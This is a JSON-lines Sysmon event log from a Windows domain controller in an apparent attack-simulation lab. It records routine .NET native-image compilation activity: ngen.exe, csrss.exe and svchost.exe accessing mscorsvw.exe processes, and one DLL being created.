{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.935\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-135F-5F25-0000-001093480E00}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.935","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-135F-5F25-0000-001093480E00}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.998\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010E5591000}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.998","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010E5591000}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.998\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010E5591000}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.998","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010E5591000}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:46.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010E5591000}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:46.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010E5591000}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:47.029\r\nProcessGuid: {E2A3D6B1-1397-5F25-0000-0010E5591000}\r\nProcessId: 4580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\System.Web.Routing.dll\r\nCreationUtcTime: 2020-08-01 07:02:47.029","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:47.029","ProcessGuid":"{E2A3D6B1-1397-5F25-0000-0010E5591000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\System.Web.Routing.dll","CreationUtcTime":"2020-08-01 07:02:47.029","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.060\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010375D1000}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:47.060","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1397-5F25-0000-0010375D1000}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:47.060\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1397-5F25-0000-0010375D1000}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 